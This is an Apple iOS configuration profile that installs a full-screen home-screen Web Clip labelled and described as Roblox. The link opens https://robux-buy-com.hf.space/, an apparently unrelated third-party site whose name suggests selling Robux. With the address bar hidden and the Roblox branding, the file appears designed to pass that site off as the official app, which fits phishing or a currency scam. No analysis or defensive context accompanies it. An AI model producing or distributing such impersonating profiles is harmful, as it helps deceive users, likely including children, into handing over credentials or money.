<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
    <key>PayloadContent</key>
    <array>
        <dict>
            <key>FullScreen</key>
            <true/>

            <key>Icon</key>
            <data>
            PUT_BASE64_PNG_180x180_HERE
            </data>

            <key>IsRemovable</key>
            <true/>

            <key>Label</key>
            <string>Roblox</string>

            <key>PayloadDescription</key>
            <string>Configures Web Clip for Roblox</string>

            <key>PayloadDisplayName</key>
            <string>Roblox Web Clip</string>

            <key>PayloadIdentifier</key>
            <string>com.apple.webClip.managed.89B5F9B7-5B7C-4C3D-8B1E-1F9B7B7B7B7B</string>

            <key>PayloadType</key>
            <string>com.apple.webClip.managed</string>

            <key>PayloadUUID</key>
            <string>89B5F9B7-5B7C-4C3D-8B1E-1F9B7B7B7B7B</string>

            <key>PayloadVersion</key>
            <integer>1</integer>

            <key>Precomposed</key>
            <true/>

            <key>URL</key>
            <string>https://robux-buy-com.hf.space/</string>
        </dict>
    </array>

    <key>PayloadDisplayName</key>
    <string>Roblox Configuration Profile</string>

    <key>PayloadIdentifier</key>
    <string>com.manus.roblox.profile</string>

    <key>PayloadRemovalDisallowed</key>
    <false/>

    <key>PayloadType</key>
    <string>Configuration</string>

    <key>PayloadUUID</key>
    <string>A9B5F9B7-5B7C-4C3D-8B1E-1F9B7B7B7B7B</string>

    <key>PayloadVersion</key>
    <integer>1</integer>
</dict>
</plist>
